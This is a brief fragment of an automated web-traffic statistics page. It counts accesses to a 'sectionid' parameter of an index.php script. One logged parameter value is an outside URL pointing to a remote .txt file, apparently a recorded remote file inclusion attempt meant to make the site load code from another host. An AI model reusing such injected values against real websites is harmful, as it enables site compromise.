http://rich-alliance.com/cache/arab.txt? 1
Parameter sectionid
ValueAccesses
17
OTHER: 17
ScriptTotal Accesses
/wusage/monthly/2007/07/01/cgi.html//index.php